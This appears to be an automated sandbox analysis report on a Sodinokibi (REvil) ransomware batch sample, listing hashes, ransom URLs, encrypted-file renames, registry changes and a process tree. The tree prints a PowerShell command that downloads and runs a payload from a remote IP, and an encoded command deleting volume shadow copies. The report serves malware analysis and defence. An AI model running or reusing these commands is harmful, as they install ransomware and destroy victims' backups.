Analysis
max time kernel: 53s
max time network: 58s
platform: windows7_x64
resource: win7
submitted: 19-08-2020 22:10
Static task: static1
Behavioral task: behavioral1 (sample 058f5b8d291ac79c2bb7a3f231e3b5d8.bat, resource win7)
Behavioral task: behavioral2 (sample 058f5b8d291ac79c2bb7a3f231e3b5d8.bat, resource win10)
General
Target: 058f5b8d291ac79c2bb7a3f231e3b5d8.bat
Size: 217B
MD5: ac5dca786af1760da0a1d3554009dc33
SHA1: 983a1634a67dbebf5f835d167ba968f2daf3efb9
SHA256: fc1242a015ede6e41e186c71d0d5d545e49007e5a804d178aa7114fad7ecd189
SHA512: 5eae6e71fa72edefd9a1373baa4add4e9dd9fc6ad2e7410f83fb56b1ec10633b5bf2d296016857c9667564ee1043a9207f7dc8ff0dab8b363598902eb1f8c611
Malware Config
Extracted from: http://185.103.242.78/pastes/058f5b8d291ac79c2bb7a3f231e3b5d8
Extracted from: C:\nhq84-readme.txt
Family: sodinokibi
URLs:
http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/A69ACD13773F7655
http://decryptor.cc/A69ACD13773F7655
Signatures
Sodin, Sodinokibi, REvil
Ransomware with advanced anti-analysis and privilege escalation functionality.
Blacklisted process makes network request (1 IoC)
Processes: flow 3, PID 1276, powershell.exe
Modifies extensions of user files (11 IoCs)
Ransomware generally changes the extension on encrypted files.
Processes (powershell.exe):
File renamed C:\Users\Admin\Pictures\ShowCopy.png => \??\c:\users\admin\pictures\ShowCopy.png.nhq84
File renamed C:\Users\Admin\Pictures\SwitchResolve.png => \??\c:\users\admin\pictures\SwitchResolve.png.nhq84
File opened for modification \??\c:\users\admin\pictures\TraceCompare.tiff
File renamed C:\Users\Admin\Pictures\MoveUnprotect.raw => \??\c:\users\admin\pictures\MoveUnprotect.raw.nhq84
File renamed C:\Users\Admin\Pictures\ReadFind.raw => \??\c:\users\admin\pictures\ReadFind.raw.nhq84
File renamed C:\Users\Admin\Pictures\SetAdd.tif => \??\c:\users\admin\pictures\SetAdd.tif.nhq84
File renamed C:\Users\Admin\Pictures\TraceSkip.tif => \??\c:\users\admin\pictures\TraceSkip.tif.nhq84
File opened for modification \??\c:\users\admin\pictures\DenyExport.tiff
File renamed C:\Users\Admin\Pictures\DenyExport.tiff => \??\c:\users\admin\pictures\DenyExport.tiff.nhq84
File renamed C:\Users\Admin\Pictures\RegisterClear.raw => \??\c:\users\admin\pictures\RegisterClear.raw.nhq84
File renamed C:\Users\Admin\Pictures\TraceCompare.tiff => \??\c:\users\admin\pictures\TraceCompare.tiff.nhq84
Enumerates connected drives (3 TTPs)
Modifies service (2 TTPs, 4 IoCs)
Processes (vssvc.exe):
Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\COM+ REGDB Writer
Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\ASR Writer
Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\Shadow Copy Optimization Writer
Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\Registry Writer
Sets desktop wallpaper using registry (2 TTPs, 1 IoC)
Processes (powershell.exe):
Set value (str) \REGISTRY\USER\S-1-5-21-1131729243-447456001-3632642222-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\AppData\\Local\\Temp\\ctv74y.bmp"
Drops file in Program Files directory (43 IoCs, all by powershell.exe)
Suspicious behavior: CmdExeWriteProcessMemorySpam (1 IoC)
Processes: PID 1276 powershell.exe
Suspicious behavior: EnumeratesProcesses (5 IoCs)
Processes: PID 1276 powershell.exe (3 events), PID 1548 powershell.exe (2 events)
Suspicious use of AdjustPrivilegeToken (7 IoCs)
Processes:
Token: SeDebugPrivilege, PID 1276 powershell.exe (2 events)
Token: SeDebugPrivilege, PID 1548 powershell.exe
Token: SeBackupPrivilege, PID 1856 vssvc.exe
Token: SeRestorePrivilege, PID 1856 vssvc.exe
Token: SeAuditPrivilege, PID 1856 vssvc.exe
Token: SeTakeOwnershipPrivilege, PID 1276 powershell.exe
Suspicious use of WriteProcessMemory (8 IoCs)
Processes:
PID 1156 cmd.exe wrote to memory of PID 1276 powershell.exe (4 events)
PID 1276 powershell.exe wrote to memory of PID 1548 powershell.exe (4 events)
Processes
C:\Windows\system32\cmd.exe (PID 1156)
  Command line: cmd /c "C:\Users\Admin\AppData\Local\Temp\058f5b8d291ac79c2bb7a3f231e3b5d8.bat"
  Signatures: Suspicious use of WriteProcessMemory
  C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe (PID 1276, child of 1156)
    Command line: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "IEX (New-Object System.Net.WebClient).DownloadString('http://185.103.242.78/pastes/058f5b8d291ac79c2bb7a3f231e3b5d8');Invoke-SFWJRWOSAI;Start-Sleep -s 10000"
    Signatures: Blacklisted process makes network request; Modifies extensions of user files; Sets desktop wallpaper using registry; Drops file in Program Files directory; Suspicious behavior: CmdExeWriteProcessMemorySpam; Suspicious behavior: EnumeratesProcesses; Suspicious use of AdjustPrivilegeToken; Suspicious use of WriteProcessMemory
    C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe (PID 1548, child of 1276)
      Command line: powershell -e RwBlAHQALQBXAG0AaQBPAGIAagBlAGMAdAAgAFcAaQBuADMAMgBfAFMAaABhAGQAbwB3AGMAbwBwAHkAIAB8ACAARgBvAHIARQBhAGMAaAAtAE8AYgBqAGUAYwB0ACAAewAkAF8ALgBEAGUAbABlAHQAZQAoACkAOwB9AA==
      (the -e argument is the base64 encoding of the UTF-16LE string "Get-WmiObject Win32_Shadowcopy | ForEach-Object {$_.Delete();}", which deletes volume shadow copies)
      Signatures: Suspicious behavior: EnumeratesProcesses; Suspicious use of AdjustPrivilegeToken
C:\Windows\system32\vssvc.exe (PID 1856)
  Command line: C:\Windows\system32\vssvc.exe
  Signatures: Modifies service; Suspicious use of AdjustPrivilegeToken